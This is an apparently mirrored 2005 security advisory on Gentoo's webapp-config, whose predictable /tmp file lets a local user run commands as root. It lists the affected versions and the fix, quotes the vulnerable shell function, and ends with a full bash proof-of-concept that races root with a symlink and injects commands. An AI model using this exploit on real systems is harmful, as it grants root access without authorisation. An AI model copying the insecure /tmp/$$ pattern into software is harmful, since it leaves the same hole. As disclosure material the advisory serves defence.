Lucene search
webapp-config-05182005.txt
Gentoo webapp-config insecure temporary file creation allows local user to execute commands with root privilege
Show more
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
#########################################################
Gentoo webapp-config insecure temporary file creation
Vendor: http://www.gentoo.org
Advisory: http://www.zataz.net/adviso/webapp-config-05182005.txt
Vendor informed: yes
Exploit available: yes
Impact : high
Exploitation : low
#########################################################
Gentoo webapp-config contain a security flaw wich could allow a
malicious local user to execute command with root privileges.
The vulnerability is due to an insecure temporary file creation.
The exploitation require that the root user install, upgrade or delete
Gentoo provided web application with the webapp-config tool.
##########
Versions:
##########
webapp-config < 1.10-r14
##########
Solution:
##########
Upgrade to net-www/webapp-config 1.10-r14
#########
Timeline:
#########
Discovered : 2005-05-07
Vendor notified : 2005-05-07
Vendor response : 2005-05-07
Vendor fix : 2005-05-08
Disclosure :
#####################
Technical details :
#####################
Vulnerable code :
- -----------------
Begin line 2711
fn_show_postinst ()
{
if [ ! -f "${MY_APPDIR}/postinst-en.txt" ]; then
return
fi
local my_file="/tmp/$$.postinst.txt"
fn_run_vars
# we create a temporary file, so that we can expand the
variables
# that are used in the file
echo "cat <<webapp-EOF" > "$my_file"
cat "${MY_APPDIR}/postinst-en.txt" >> "$my_file"
echo "webapp-EOF" >> "$my_file"
# execute the temporary file, to generate the output
echo
. "$my_file"
echo
# it's a temporary file, so let's get rid of it now
rm -f "$my_file"
}
#####
POC :
#####
http://www.zataz.net/dev/webapp-poc.sh.txt
#########
Related :
#########
Bug report : https://bugs.gentoo.org/show_bug.cgi?id=91785
GLSA : Waiting for it
#####################
Credits :
#####################
Eric Romang ([email protected] - ZATAZ Audit)
Thxs to Gentoo Security Team. (Taviso, jaervosz, solar, etc.)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)
iD8DBQFCkF9vXXuxWE8lDAcRAjSjAJ0e4O5D5H2CDWOBex+Aay2BCYVznwCfci+7
KGXba0qvTu5b20ABcBkABKQ=
=7wI3
-----END PGP SIGNATURE-----
#!/bin/bash
# Eric Romang aka wow ([email protected])
# webapp-config race condition how permit execution of arbitrary command with root privileges
# work with < webapp-config 1.10-r14
rm -f webapp-config_trace.txt fake_tmp_file /tmp/*.postinst.txt
touch ~/fake_tmp_file
echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting for webapp-config execution..."
while [ "$status" == 0 ]
do
ps auxw|grep webapp-config|grep root
if [ "$?" == 0 ]
then
echo "1" > webapp-config_trace.txt
fi
status=`cat webapp-config_trace.txt`
done
echo "Process caught !"
process_id=`pgrep -u root webapp-config`
ln -s ~/fake_tmp_file /tmp/$process_id.postinst.txt
echo "fake_file_created!"
echo "we force the file to be overwritten"
echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting the end of webapp-config"
echo "during all the configuration we force the file to be overwritten"
while [ "$status" == 0 ]
do
ps auxw|grep webapp-config|grep root
if [ "$?" == 1 ]
then
echo "1" > webapp-config_trace.txt
else
echo "echo premature end of script; exit 1;" > ~/fake_tmp_file
fi
status=`cat webapp-config_trace.txt`
done
echo "end of webapp-config"
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo22 May 2005 00:00Current
7.4High risk
Vulners AI Score7.4